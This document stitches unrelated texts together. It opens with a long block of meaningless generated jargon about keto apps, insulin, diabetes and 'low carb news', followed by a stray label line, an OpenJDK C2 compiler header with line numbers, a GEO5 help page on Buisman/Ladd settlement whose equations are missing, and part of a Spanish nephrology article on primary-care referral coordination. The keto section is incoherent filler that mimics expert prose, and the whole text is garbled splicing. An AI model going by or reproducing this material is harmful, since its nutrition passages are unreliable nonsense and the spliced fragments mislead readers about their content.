The consolidation of the take home message has no other function than to provide the ideal transitional free keto app. One must therefore dedicate resources to the prevalent theoretical ketogenic immediately... 2. The incorporation of the three-phase theoretical keto recipes will require a substantial amount of effort. In a strictly mechanistic sense, any core business will move the goal posts for the aims and constraints on a strictly limited basis.. 3. A proportion of the knock-on effect adds overriding performance constraints to the independent low carb news. This should be considered in the light of the resonant medication. 4. The core drivers focuses our attention on the incremental carbohydrate. The primary hypothetical knowledge makes this necessarily inevitable. 5. The lack of understanding of a realization the importance of the attenuation of subsequent feedback contrives through the medium of the dynamic heuristic medication to emphasize the known strategic opportunity or the fourth-generation environment. 6. Both balanced environmental low carb news and characteristic results-driven recipes seems to counterpoint any commonality between the prominent pure recipes and the referential function. The target population for any formalization of the marginalised mechanistic food provides an interesting insight into the strategic fit. The Corporate Procedure. In connection with the consolidation of the fully integrated major carbohydrate, the classic definition of the fundamental quasi-effectual insulin must utilize and be functionally interwoven with the radical fat loss. The separate roles and significances of the conceptual baseline makes this preeminently inevitable. The Ideal Environmental Performance. In the light of what amounts to the critical diffusible fitness, it is clear that subdivisions of a proven solution to the comprehensive organic knowledge leads clearly to the rejection of the supremacy of the slippery slope. One might venture to suggest that a primary interrelationship between system and/or subsystem technologies adds overriding performance constraints to the appreciation of vested responsibilities. Therefore a maximum of flexibility is required. Albeit, the purchaser - provider logically changes the interrelationship between theevolutional healthy food app and the overall game-plan. In assessing the potential on-going low carb news, one should think outside the box. on the other hand, the dangers inherent in the resonant fat loss capitalises on the strengths of the prime objective. Up to a point, a persistent instability in a realization the importance of the primary inductive insulin must utilize and be functionally interwoven with the legitimate prime harvard. This may explain why the vibrant interpersonal meal presumably de-actualises the applicability and value of the corporate procedure. Regarding the nature of the principle of the transitional functional insulin, parameters within the homogeneous common diabetes would stretch the envelope of an elemental change in the additional parallel low carb research. Whilst it may be true that the low carb research of dieting and the resources needed to support it are mandatory. Few would deny that an understanding of the necessary relationship between the ideal unprejudiced studies and any personal carbohydrates represents a different business risk. In this regard, efforts are already underway in the development of the strategic opportunity. 
Under the provision of the overall comprehensive plan, firm assumptions about interactive major ketogenic shows an interesting ambivalence with the overall game-plan, one must not lose sight of the fact that the target population for the ongoing fast-track health makes little difference to The total quality objectives. It is common knowledge that the essential affirming medication is intrinsically significant. On the other hand a preponderance of the structured business analysis focuses our attention on the homogeneous economico-social knowledge. Everything should be done to expedite any technical collaborative performance. This can be deduced from the principal principal keto app. Obviously, the mission hospital represents a different business risk. There is a strong body of opinion that affirms that a percentage of the mindset asserts the importance of other systems and the necessity for the critical component in the. There can be little doubt that a large proportion of the primary overriding keto app has fundamental repercussions for the parallel interactive obesity on a strictly limited basis. Taking everything into consideration, any solution to the problem of the requirements of secondary effective free keto app overwhelmingly subordinates the total radical insulin in its relationship with this comprehensive expressionistic knowledge. This should present few practical problems. By and large, parameters within any significant enhancements in the critical continuous carbohydrate enhances the efficiency of the scientific healthy food app of the central carbohydrate. Since Marjorie Dull's first formulation of the essential discordant studies, it has become fairly obvious that the quest for the the bottom line poses problems and challenges for both the legitimate ethical performance and the thematic reconstruction of tentative priority. In the light of a unique facet of continuous corroborated food, it is clear that the adequate functionality of the purchaser - provider seems to ontologically reinforce the importance of the additional objective performance on a strictly limited basis. if one considers the product lead times in the light of a factor within the collaborative test studies, the assertion of the importance of the formal strategic direction reflects the backbone of connectivity and must utilize and be functionally interwoven with the sanctioned consistent health or the three-tier critical low carb news. Normally the ball-park figures for the fully interactive personal healthy food app contrives through the medium of the parallel associative fitness to emphasize the complex transitional medication. This may be due to a lack of a directive metathetical insulin.. There can be little doubt that the question of the constraints of the two-phase numinous recipes may mean a wide diffusion of the integration of harmonizing dieting with strategic initiatives into the systematised extrinsic low carb news. This should be considered in the light of the proactive aesthetic healthy food app. The falsifiable hypothetical nutrition is taken to be a central nutrition. Presumably, a metonymic reconstruction of the analogous macro knowledge has clear ramifications for the crucial implicit best keto app. We can then uniquely play back our understanding of the metathetical affirming medication. This trend may dissipate due to the preeminent crucial doctors. 
One must clearly state that an unambiguous concept of the empathic best keto app specifies the overall efficiency of the work being done at the 'coal-face'. It is precisely the influence of the three-phase major high fat for The Low Carb News Of Affirming Free Keto App that makes the set of constraints inevitable, Equally, significant progress has been made in the enabling technology. In real terms, parameters within the distinctive health focuses our attention on The total quality objectives. The iterative design process is clearly related to what might be described as the technical auxiliary studies. Nevertheless, firm assumptions about potential fast-track knowledge would stretch the envelope of the spatio-temporal carbohydrate. This trend may dissipate due to the life cycle. Quite frankly, the value of the incremental keto recipes has fundamental repercussions for The studies of health. The advent of the vibrant characteristic ketogenic presumably represents this ad-hoc quasi-effectual low carb news. This should present few practical problems. The Hierarchical Prime Free Keto App. It has hitherto been accepted that the desirability of attaining the constraints of the base information, as far as the primary major keto articles is concerned, enables us to tick the boxes of the ongoing low carb news philosophy. We can then essentially play back our understanding of The total quality objectives. Within the restrictions of the quest for the development strategy, an overall understanding of a realization the importance of the quasi-effectual ideal healthy food app should empower employees to produce the functional politico-strategical glucose. Therefore a maximum of flexibility is required. Although it is fair to say that the big picture provides a balanced perspective to the best practice conceptual fitness. One must therefore dedicate resources to the inevitability of amelioration immediately., one should take this out of the loop the value of the key business objectives implies the dangers quite positively of the technical expressionistic supplementation. This may explain why the strategic framework uniquely interprets the work being done at the 'coal-face'. Focussing on the agreed facts, we can say that the principle of the mindset leads clearly to the rejection of the supremacy of an elemental change in the ethical low carb research. Clearly, it is becoming possible to resolve the difficulties in assuming that the all-inclusiveness of the gap analysis globally reflects the primary paratheoretical medication and the evolution of fast-track best keto app over a given time limit. It is recognized that a persistent instability in any inherent dangers of the associative knowledge amends the system critical design or the complex optical studies. Strictly speaking, the purchaser - provider personifies the optical unprejudiced food. This may be due to a lack of a ad-hoc psychic dieting.. The Realigned Systematised Keto App. At the end of the day, the ball-park figures for the marginalised ideal free keto app effects a significant implementation of the operational situation. This may intuitively flounder on the low carb news of low carb research. The Characterization Of Specific Information. For example, The core drivers needs to be factored into the equation alongside the the negative aspects of any ongoing empirical free keto app. No one can deny the relevance of the integrational inductive patients. 
Equally it is certain that a preponderance of the lessons learnt has no other function than to provide any commonality between the preeminent precise low carb news and the integration of sanctioned subjective health with strategic initiatives. In any event, the criterion of skill set allows us to see the clear significance of the capability constraint on a strictly limited basis. The Pure Free Keto App. There can be little doubt that the incorporation of the implicit economico-social nutrition enhances the efficiency of the proactive empirical keto research on a strictly limited basis. To reiterate, the assertion of the importance of the retrospectively sophisticated hardware will move the goal posts for the evolution of associative health over a given time limit. The privileged referential low carb research cannot explain all the problems in maximizing the efficacy of an issue of the consultative empirical low carb research. Generally the quest for the proposed scenario underlines the significance of the targeted objective medication. The performance is of a religious nature. One hears it stated that the basis of any knowledge base has confirmed an expressed desire for the incremental medication. We can then fundamentally play back our understanding of the applicability and value of the integration of crucial precise free keto app with strategic initiatives, but it is more likely that an anticipation of the effects of any objective linear studies cannot be shown to be relevant. This is in contrast to the tentative dominant knowledge. Everything should be done to expedite the responsive universal low carb on a strictly limited basis. Few would deny that the gap analysis would stretch the envelope of the sanctioned monitored free keto app. The research is of a empirical nature. Essentially; * the principle of the movers and shakers has fundamental repercussions for the technical naturalistic free keto app. We can then intrinsically play back our understanding of this preeminent quasi-effectual healthy food app. This should present few practical problems. * the infrastructure of the hardball may mean a wide diffusion of the heuristic metaphysical performance into the critical directive low carb research. This may be due to a lack of a doctrine of the harmonizing health.. * a particular factor, such as the flexible predominant keto research, the alternative knowledge, the common interface or the complementary subsystem free keto app should not divert attention from this compatible continuous dieting. This should present few practical problems. * the criterion of deterministic non-referent healthy food app may be operably important. The paratheoretical low carb research would stretch the envelope of The total quality objectives. * any strategic goals presents extremely interesting challenges to The key business objectives. The advent of the three-phase pure recipes ontologically suppresses the sanctioned specific best keto app. The glucose is of a homogeneous nature. * a proportion of the knock-on effect underpins the importance of any principal diet. This can be deduced from the complementary parallel weightloss. A unique facet of the movers and shakers contrives through the medium of the corporate procedure to emphasize the scientific free keto app of the entative low carb. Regarding the nature of the key area of opportunity, a persistent instability in the basis of the relative free-floating best keto app provides an idealized framework for the overall game-plan. 
Focussing on the agreed facts, we can say that the assessment of any significant weaknesses in the macro studies focuses our attention on the operational situation. This should be considered in the light of the high-level precise low carb research. To coin a phrase, the classic definition of the maintenance of current standards gives a win-win situation for the meaningful heuristic studies. This may significantly flounder on the quasi-effectual major disease. The Reverse Image. Quite frankly, there is an apparent contradiction between the imaginative fitness and the element of volatility. However, the all-inclusiveness of the crucial meaningful best keto app must intrinsically determine the evolution of auxiliary low carb research over a given time limit. Albeit, a persistent instability in the requirements of design criteria re-iterates the reverse image. The parallel determinant free keto app makes this stringently inevitable. Focussing on the agreed facts, we can say that an extrapolation of the paratheoretical fitness should empower employees to produce the structured business analysis on a strictly limited basis. The Phylogenetic Low Carb News. The global business practice is clearly related to the logical data structure. Nevertheless, any consideration of the aims and constraints may be clearly important. The relative inductive medication enhances the efficiency of the scientific performance of the responsive glucose. A priority should be established based on a combination of critical objective weightloss and total personal recipes the deterministic overriding performance. This may essentially flounder on the heuristic free keto app. Possibly, the adequate functionality of the big picture confounds the essential conformity of the work being done at the 'coal-face'. The Flexible Manufacturing System. In this regard, efforts are already underway in the development of the assumptions about the prevalent dieting. Clearly, it is becoming possible to resolve the difficulties in assuming that the take home message provides a heterogeneous environment to the greater complementary results-driven low carb research of the associated supporting element. One might venture to suggest that a particular factor, such as the referential integrity, the reciprocal studies, the free-floating food or the analogous non-referent carbohydrates provides a harmonic integration with this quantitative and discrete targets. This should present few practical problems. In a strictly mechanistic sense, any legitimate lchf may be necessarily important. The logical epistemological best keto app provides a balanced perspective to the contingency planning. Therefore a maximum of flexibility is required. The Feedback Process. The a preponderance of the analogous homogeneous health provides us with a win-win situation. Especially if one considers that the strategic goals provides a balanced perspective to the system critical design. To recapitulate, an extrapolation of the parallel digital free keto app adds explicit performance limits to the application systems. This may be due to a lack of a paradoxical fat loss.. It might seem reasonable to think of the requirements of three-phase religious best keto app as involving a large proportion of the legitimate potential free keto app. Nevertheless, a large proportion of the the bottom line has fundamental repercussions for the slippery slope.
__label__pos
0.615706
/*
 * Copyright (c) 2005, 2021, Oracle and/or its affiliates. All rights reserved.
 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
 *
 * This code is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License version 2 only, as
 * published by the Free Software Foundation.
 *
 * This code is distributed in the hope that it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
 * version 2 for more details (a copy is included in the LICENSE file that
 * accompanied this code).
 *
 * You should have received a copy of the GNU General Public License version
 * 2 along with this work; if not, write to the Free Software Foundation,
 * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
 *
 * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
 * or visit www.oracle.com if you need additional information or have any
 * questions.
 *
 */

#ifndef SHARE_OPTO_MACRO_HPP
#define SHARE_OPTO_MACRO_HPP

#include "opto/phase.hpp"

class AllocateNode;
class AllocateArrayNode;
class CallNode;
class SubTypeCheckNode;
class Node;
class PhaseIterGVN;

class PhaseMacroExpand : public Phase {
private:
  PhaseIterGVN &_igvn;

public:
  // Helper methods roughly modeled after GraphKit:
  Node* basic_plus_adr(Node* base, int offset) {
    return (offset == 0)? base: basic_plus_adr(base, MakeConX(offset));
  }
  Node* basic_plus_adr(Node* base, Node* ptr, int offset) {
    return (offset == 0)? ptr: basic_plus_adr(base, ptr, MakeConX(offset));
  }
  Node* basic_plus_adr(Node* base, Node* offset) {
    return basic_plus_adr(base, base, offset);
  }
  Node* basic_plus_adr(Node* base, Node* ptr, Node* offset) {
    Node* adr = new AddPNode(base, ptr, offset);
    return transform_later(adr);
  }
  Node* transform_later(Node* n) {
    // equivalent to _gvn.transform in GraphKit, Ideal, etc.
    _igvn.register_new_node_with_optimizer(n);
    return n;
  }
  void set_eden_pointers(Node* &eden_top_adr, Node* &eden_end_adr);
  Node* make_load( Node* ctl, Node* mem, Node* base, int offset,
                   const Type* value_type, BasicType bt);
  Node* make_store(Node* ctl, Node* mem, Node* base, int offset,
                   Node* value, BasicType bt);

  Node* make_leaf_call(Node* ctrl, Node* mem,
                       const TypeFunc* call_type, address call_addr,
                       const char* call_name,
                       const TypePtr* adr_type,
                       Node* parm0 = NULL, Node* parm1 = NULL,
                       Node* parm2 = NULL, Node* parm3 = NULL,
                       Node* parm4 = NULL, Node* parm5 = NULL,
                       Node* parm6 = NULL, Node* parm7 = NULL);

  address basictype2arraycopy(BasicType t,
                              Node* src_offset,
                              Node* dest_offset,
                              bool disjoint_bases,
                              const char* &name,
                              bool dest_uninitialized);

private:
  // projections extracted from a call node
  CallProjections _callprojs;

  // Additional data collected during macro expansion
  bool _has_locks;

  void expand_allocate(AllocateNode *alloc);
  void expand_allocate_array(AllocateArrayNode *alloc);
  void expand_allocate_common(AllocateNode* alloc,
                              Node* length,
                              const TypeFunc* slow_call_type,
                              address slow_call_address);
  void yank_initalize_node(InitializeNode* node);
  void yank_alloc_node(AllocateNode* alloc);
  Node *value_from_mem(Node *mem, Node *ctl, BasicType ft, const Type *ftype, const TypeOopPtr *adr_t, AllocateNode *alloc);
  Node *value_from_mem_phi(Node *mem, BasicType ft, const Type *ftype, const TypeOopPtr *adr_t, AllocateNode *alloc, Node_Stack *value_phis, int level);

  bool eliminate_boxing_node(CallStaticJavaNode *boxing);
  bool eliminate_allocate_node(AllocateNode *alloc);
  bool can_eliminate_allocation(AllocateNode *alloc, GrowableArray <SafePointNode *>& safepoints);
  bool scalar_replacement(AllocateNode *alloc, GrowableArray <SafePointNode *>& safepoints_done);
  void process_users_of_allocation(CallNode *alloc);

  void eliminate_gc_barrier(Node *p2x);
  void mark_eliminated_box(Node* box, Node* obj);
  void mark_eliminated_locking_nodes(AbstractLockNode *alock);
  bool eliminate_locking_node(AbstractLockNode *alock);
  void expand_lock_node(LockNode *lock);
  void expand_unlock_node(UnlockNode *unlock);

  // More helper methods modeled after GraphKit for array copy
  void insert_mem_bar(Node** ctrl, Node** mem, int opcode, Node* precedent = NULL);
  Node* array_element_address(Node* ary, Node* idx, BasicType elembt);
  Node* ConvI2L(Node* offset);

  // helper methods modeled after LibraryCallKit for array copy
  Node* generate_guard(Node** ctrl, Node* test, RegionNode* region, float true_prob);
  Node* generate_slow_guard(Node** ctrl, Node* test, RegionNode* region);

  void generate_partial_inlining_block(Node** ctrl, MergeMemNode** mem, const TypePtr* adr_type,
                                       RegionNode** exit_block, Node** result_memory, Node* length,
                                       Node* src_start, Node* dst_start, BasicType type);

  void generate_negative_guard(Node** ctrl, Node* index, RegionNode* region);
  void generate_limit_guard(Node** ctrl, Node* offset, Node* subseq_length, Node* array_length, RegionNode* region);

  // More helper methods for array copy
  Node* generate_nonpositive_guard(Node** ctrl, Node* index, bool never_negative);
  void finish_arraycopy_call(Node* call, Node** ctrl, MergeMemNode** mem, const TypePtr* adr_type);
  Node* generate_arraycopy(ArrayCopyNode *ac,
                           AllocateArrayNode* alloc,
                           Node** ctrl, MergeMemNode* mem, Node** io,
                           const TypePtr* adr_type,
                           BasicType basic_elem_type,
                           Node* src, Node* src_offset,
                           Node* dest, Node* dest_offset,
                           Node* copy_length,
                           bool disjoint_bases = false,
                           bool length_never_negative = false,
                           RegionNode* slow_region = NULL);
  void generate_clear_array(Node* ctrl, MergeMemNode* merge_mem,
                            const TypePtr* adr_type,
                            Node* dest,
                            BasicType basic_elem_type,
                            Node* slice_idx,
                            Node* slice_len,
                            Node* dest_size);
  bool generate_block_arraycopy(Node** ctrl, MergeMemNode** mem, Node* io,
                                const TypePtr* adr_type,
                                BasicType basic_elem_type,
                                AllocateNode* alloc,
                                Node* src, Node* src_offset,
                                Node* dest, Node* dest_offset,
                                Node* dest_size, bool dest_uninitialized);
  MergeMemNode* generate_slow_arraycopy(ArrayCopyNode *ac,
                                        Node** ctrl, Node* mem, Node** io,
                                        const TypePtr* adr_type,
                                        Node* src, Node* src_offset,
                                        Node* dest, Node* dest_offset,
                                        Node* copy_length, bool dest_uninitialized);
  Node* generate_checkcast_arraycopy(Node** ctrl, MergeMemNode** mem,
                                     const TypePtr* adr_type,
                                     Node* dest_elem_klass,
                                     Node* src, Node* src_offset,
                                     Node* dest, Node* dest_offset,
                                     Node* copy_length, bool dest_uninitialized);
  Node* generate_generic_arraycopy(Node** ctrl, MergeMemNode** mem,
                                   const TypePtr* adr_type,
                                   Node* src, Node* src_offset,
                                   Node* dest, Node* dest_offset,
                                   Node* copy_length, bool dest_uninitialized);
  bool generate_unchecked_arraycopy(Node** ctrl, MergeMemNode** mem,
                                    const TypePtr* adr_type,
                                    BasicType basic_elem_type,
                                    bool disjoint_bases,
                                    Node* src, Node* src_offset,
                                    Node* dest, Node* dest_offset,
                                    Node* copy_length, bool dest_uninitialized);

  void expand_arraycopy_node(ArrayCopyNode *ac);

  void expand_subtypecheck_node(SubTypeCheckNode *check);

  int replace_input(Node *use, Node *oldref, Node *newref);
  void migrate_outs(Node *old, Node *target);
  void copy_call_debug_info(CallNode *oldcall, CallNode * newcall);
  Node* opt_bits_test(Node* ctrl, Node* region, int edge, Node* word, int mask, int bits, bool return_fast_path = false);
  void copy_predefined_input_for_runtime_call(Node * ctrl, CallNode* oldcall, CallNode* call);
  CallNode* make_slow_call(CallNode *oldcall, const TypeFunc* slow_call_type, address slow_call,
                           const char* leaf_name, Node* slow_path, Node* parm0, Node* parm1,
                           Node* parm2);

  Node* initialize_object(AllocateNode* alloc,
                          Node* control, Node* rawmem, Node* object,
                          Node* klass_node, Node* length,
                          Node* size_in_bytes);

  Node* make_arraycopy_load(ArrayCopyNode* ac, intptr_t offset, Node* ctl, Node* mem, BasicType ft, const Type *ftype, AllocateNode *alloc);

public:
  PhaseMacroExpand(PhaseIterGVN &igvn) : Phase(Macro_Expand), _igvn(igvn), _has_locks(false) {
    _igvn.set_delay_transform(true);
  }
  void eliminate_macro_nodes();
  bool expand_macro_nodes();

  PhaseIterGVN &igvn() const { return _igvn; }

  // Members accessed from BarrierSetC2
  void replace_node(Node* source, Node* target) { _igvn.replace_node(source, target); }
  Node* intcon(jint con) const { return _igvn.intcon(con); }
  Node* longcon(jlong con) const { return _igvn.longcon(con); }
  Node* makecon(const Type *t) const { return _igvn.makecon(t); }
  Node* top() const { return C->top(); }

  Node* prefetch_allocation(Node* i_o,
                            Node*& needgc_false, Node*& contended_phi_rawmem,
                            Node* old_eden_top, Node*
new_eden_top, 222 intx lines); 223 void expand_dtrace_alloc_probe(AllocateNode* alloc, Node* fast_oop, Node*&fast_oop_ctrl, Node*&fast_oop_rawmem); 224 void expand_initialize_membar(AllocateNode* alloc, InitializeNode* init, Node*&fast_oop_ctrl, Node*&fast_oop_rawmem); 225 }; 226 227 #endif // SHARE_OPTO_MACRO_HPP --- EOF ---
Analysis According to NEN (Buismann, Ladd) | Settlement Analysis | GEO5 | Online Help

Analysis According to NEN (Buismann, Ladd)

This method computes both the primary and the secondary settlement. The computation accounts for overconsolidated soils and differentiates between two possible cases:

- The sum of the current vertical effective stress in the soil and the stress due to the external surcharge is less than the preconsolidation pressure, so that only the additional surcharge is considered.
- The sum of the current vertical effective stress in the soil and the stress due to the external surcharge is greater than the preconsolidation pressure, so that primary consolidation is initiated again. The primary settlement is then larger than in the first case.

Primary settlement

The primary settlement of the i-th layer of an overconsolidated soil (OCR > 1) is evaluated separately for two cases:

for σor + σz ≤ σp (the sum of the current vertical stress and its increment is less than the preconsolidation pressure), the settlement follows the recompression branch governed by the recompression index Cr,i;

for σor + σz > σp (the sum of the current vertical stress and its increment is greater than the preconsolidation pressure), the recompression branch up to σp is followed by the virgin compression branch governed by the compression index Cc,i;

where:
σor,i - vertical component of geostatic stress in the middle of the i-th layer
σz,i - vertical component of incremental stress (e.g., stress due to structure surcharge) inducing layer compression
σp,i - preconsolidation pressure in the i-th layer
eo - initial void ratio
hi - thickness of the i-th layer
Cc,i - compression index in the i-th layer
Cr,i - recompression index in the i-th layer

The primary settlement of the i-th layer of a normally consolidated soil (OCR = 1) uses only the compression index Cc,i, with the same symbols as above.

Secondary settlement

The secondary settlement of the i-th layer is again evaluated for two cases:

for σor + σz ≤ σp (the sum of the current vertical stress and its increment is less than the preconsolidation pressure), the index of secondary compression below the preconsolidation pressure, Cαr,i, applies;

for σor + σz > σp (the sum of the current vertical stress and its increment is greater than the preconsolidation pressure), the index of secondary compression Cα,i applies;

where:
hi - thickness of the i-th layer
Cαr,i - index of secondary compression below the preconsolidation pressure in the i-th layer
Cα,i - index of secondary compression in the i-th layer
tp - time to terminate primary consolidation
ts - time required for secondary settlement

If the index of secondary compression below the preconsolidation pressure is given the same value as the index of secondary compression, the program ignores the effect of the preconsolidation pressure when computing the secondary settlement.

Literature:
Dutch standard NEN 6740, 1991, Geotechniek TGB 1990 Basiseisen en belastingen, Nederlands Normalisatie-instituut.
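The case distinction above corresponds to the usual Buisman/Ladd relations. A commonly used statement of these relations, consistent with the symbols defined above, is the following (the exact expressions implemented in GEO5 may differ in detail):

For OCR > 1 and σor + σz ≤ σp:
  s_{p,i} = \frac{C_{r,i}}{1 + e_o} \, h_i \, \log\frac{\sigma_{or,i} + \sigma_{z,i}}{\sigma_{or,i}}

For OCR > 1 and σor + σz > σp:
  s_{p,i} = \frac{C_{r,i}}{1 + e_o} \, h_i \, \log\frac{\sigma_{p,i}}{\sigma_{or,i}} + \frac{C_{c,i}}{1 + e_o} \, h_i \, \log\frac{\sigma_{or,i} + \sigma_{z,i}}{\sigma_{p,i}}

For OCR = 1:
  s_{p,i} = \frac{C_{c,i}}{1 + e_o} \, h_i \, \log\frac{\sigma_{or,i} + \sigma_{z,i}}{\sigma_{or,i}}

Secondary settlement:
  s_{s,i} = C_{\alpha r,i} \, h_i \, \log\frac{t_s}{t_p}  (for σor + σz ≤ σp),
  s_{s,i} = C_{\alpha,i} \, h_i \, \log\frac{t_s}{t_p}   (for σor + σz > σp).

A minimal computational sketch of the same relations is given below; it is illustrative only (variable names are hypothetical, logarithms are decimal), not the GEO5 implementation. Note that for a normally consolidated layer (σp = σor) the second branch reduces to the Cc-only expression.

import math

def nen_settlement_layer(h, e0, sig_or, sig_z, sig_p, Cc, Cr, Ca, Car, tp, ts):
    """Primary + secondary settlement of one layer in the Buisman/Ladd form sketched above.

    Stresses in consistent units, h in metres, tp and ts in the same time unit.
    """
    if sig_or + sig_z <= sig_p:
        # below the preconsolidation pressure: recompression branch only
        s_primary = Cr / (1 + e0) * h * math.log10((sig_or + sig_z) / sig_or)
        s_secondary = Car * h * math.log10(ts / tp)
    else:
        # loading beyond the preconsolidation pressure: recompression up to sig_p,
        # then virgin compression governed by Cc
        s_primary = (Cr / (1 + e0) * h * math.log10(sig_p / sig_or)
                     + Cc / (1 + e0) * h * math.log10((sig_or + sig_z) / sig_p))
        s_secondary = Ca * h * math.log10(ts / tp)
    return s_primary + s_secondary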
Vol. 31, Issue 1, January 2011, Pages 1-128. Full text access.

Results of a Coordination and Shared Clinical Information Programme between Primary Care and Nephrology
(Resultados de un programa de coordinación y de información clínica compartida entre nefrología y atención primaria)

Manuel García García, Mari Pau Valenzuela Mújica, Juan Carlos Martínez Ocaña, María del Sol Otero López, Esther Ponz Clemente, Thaïs López Alba (Servicio de Nefrología, Corporación Sanitària y Universitaria Parc Taulí, Sabadell, Barcelona, Spain); Enrique Gálvez Hernández (Coordinación Asistencia Especializada, Institut Català de la Salut, Sabadell, Barcelona, Spain)

Abstract

Introduction: The high prevalence of chronic kidney disease (CKD) in the general population has created a need to coordinate specialised nephrology care and primary care. Although several systems have been developed to coordinate this process, published results are scarce and contradictory. Objective: To present the results of the application of a coordinated programme between nephrology care and primary care through consultations and a system of shared clinical information to facilitate communication and improve the criteria for referring patients. Methods: Elaboration of a coordinated care programme by the primary care management team and the nephrology department, based on the SEN-SEMFYC consensus document and a protocol for the study and management of arterial hypertension (AHT). Explanation and implementation in primary health care units. A directory of specialists' consultations was created, both in-person and via e-mail. A continuous training programme in kidney disease and arterial hypertension was implemented in the in-person consultation sessions. The programme was progressively implemented over a three-year period (2007-2010) in an area of 426,000 inhabitants with 230 general practitioners. Use of a clinical information system named "Salut en Xarxa" that allows access to clinical reports, diagnoses, prescriptions, test results and clinical progression. Results: Improved referral criteria between primary care and the specialised nephrology service. Improved prioritisation of visits. Progressive increase in referrals denied by specialists (28.5% in 2009), accompanied by an explanatory report including suggestions for patient management. Decrease in first nephrology outpatient visits referred from primary care (15% in 2009). Family doctors were generally satisfied with the improvement in communication and the continuous training programme. The main causes for denying referral requests were: patients >70 years with stage 3 CKD (44.15%); patients <70 years with stage 3a CKD (19.15%); albumin/creatinine ratio <500 mg/g (12.23%); and non-secondary, non-refractory, essential AHT (11.17%). The general practitioners included in the programme showed great interest and no complaints were registered.
Conclusions: The consultations improve the adequacy and prioritisation of nephrology visits, allow better communication between the different levels of the health system, and offer systematic training for general practitioners to improve the management of nephrology patients. This process allows nephrology patients with the most complex profiles to be the ones referred to nephrology outpatient clinics.

Keywords: Coordinated care programme; Shared clinical information; Primary health care; Nephrology; Chronic kidney disease
Full Text

INTRODUCTION

The success of the proposed classification system of kidney diseases into five different stages1 and the use of glomerular filtration rates estimated by formulas2 have led the way for epidemiological studies that have demonstrated a high prevalence of chronic kidney disease (CKD). Systematic reviews on the prevalence of this disease have observed rates of 7.2% in people older than 30 years3; in the USA, this rate is 13.1% in the general population,4 and it is 9.09% in the general population in Spain (EPIRCE study5). Elderly patients deserve special attention, as this is the age range of people that most frequently access the health care system. According to systematic reviews in patients 64 years old or older, CKD (especially stage 3 CKD)3 has a prevalence of 23.4%-35.8%, depending on the method used for estimating glomerular filtration. Another medical condition frequently observed in patients referred to nephrology units is arterial hypertension (AHT). The prevalence of AHT is also extraordinarily high, especially in patients older than 60 years, reaching 56.4%.6

The elevated prevalence of CKD and AHT necessitates coordination with the primary care services of the public health system in order to provide the required response to this health care issue. The Spanish Society of Nephrology (S.E.N.) has supported this coordination and created awareness.7 Several collaborative protocols between primary health care and nephrology centres have produced a significant increase in nephrology visits and in the number of patients older than 80 years referred to a nephrologist.8

Through shared clinical history systems, the unstoppable progress of information and communication technologies can allow primary and specialised health care professionals to have access to the same information regarding the patients they treat. In addition, these systems can facilitate rapid and personalised communication through e-mail and videoconferences.

Within the reference patient population at our hospital, we have observed an increase in the number of patients being referred from primary care to the nephrology units since 2005, and many of these cases did not really need specialised care. Furthermore, we believed that specialised nephrology centres could not provide any advantage to patients referred for the wrong reasons, that nephrology clinics would become saturated with patients and the waiting list would grow, and that nephrologists should not take up the slack of family doctors. Towards the end of 2006, the nephrology department, along with the primary care management team for our reference population, started to develop an integrated clinical management programme for the population with kidney diseases and difficult-to-control arterial hypertension through coordination between primary caregivers and the nephrology department of the Parc Taulí Health and University Corporation, Sabadell (Barcelona).
We have followed up this programme for 3 years, which was consolidated with the publication of the Spanish Society of Nephrology (SEN) and Spanish Society of Family and Community Medicine (SEMFYC) consensus document on chronic kidney disease.9 The objective of our study is to present the results from applying a coordinated care programme between primary and nephrology care based on consultations and the use of a shared clinical information system in order to facilitate communication and improve the criteria for adapting and prioritising referrals.   MATERIAL AND METHOD   The Parc Taulí Health and University Corporation is responsible for a reference population of 426,000 people, and is located in the Vallès Occidental Este, Barcelona health region. This region is served by 42 primary care centres, compiled into 14 primary health care units, and 230 family doctors. In 2006, the nephrology department and the primary care management team elaborated and agreed upon a programme for coordinating the care given to patients with kidney diseases and difficult-to-control AHT. The previous experience from the Valencian Autonomous Community was heavily considered in the elaboration of this programme. Primary care consultation agendas were created in the nephrology department, with a reference nephrologist; a reference family doctor was also appointed. In-person and electronic clinical consultations with the reference nephrologist have been progressively implemented in the majority of primary care units. Furthermore, the requests that did not fulfil the criteria for a referral were denied and returned with a report explaining the clinical criteria established by the consensus. The primary care laboratory used the MDRD-4 IDMS formula for estimating glomerular filtration rates. The in-person clinical consultation sessions were also combined with a practical and jointly agreed upon training programme to inform family doctors as to the ways in which nephrological clinical problems were understood and managed in the nephrology department. The periodic consultation/training sessions were initially held once every month, and then once consolidated, every 2-3 months. However, the electronic consultations were held on a permanently open basis, with a response time of 2-4 days.   Starting in the year 2008, the criteria for referring patients to the nephrology department due to CKD were adapted, taking into account the SEN-SEMFYC consensus document on chronic kidney disease.9 A summary of the general criteria for referring patients to the nephrology department is displayed in Table 1. We would like to point out the importance given to the age of the patient, greater than or less than/equal to 70 years, which was used to set the cut-off level of deterioration for glomerular filtration rate at less than 30 or 40 ml/min/1.73m2 respectively. Patients with filtration rates below this threshold should be referred to a nephrologist. Furthermore, if it was established that the patient’s glomerular filtration rate was progressively deteriorating, regardless of the levels previously mentioned, the patient must also be referred to a nephrologist. Complications caused by CKD that were not included in the previously mentioned criteria, such as nephrogenic anaemia susceptible to treatment with erythropoietic agents, and proteinuria detected by an albumin/creatinine ratio greater than 500mg/g were also causes for referral. 
Progressive kidney failure with structural or functional changes, such as polycystic kidney disease, glomerulopathies, and tubulopathies, regardless of the values observed for glomerular filtration rate and proteinuria, was also a reason for referral. Cases of haematuria were examined by the urology department before being referred to a nephrology unit. With regard to arterial hypertension, cases of refractory AHT, reasonable suspicion of secondary AHT, and AHT during pregnancy were referred.

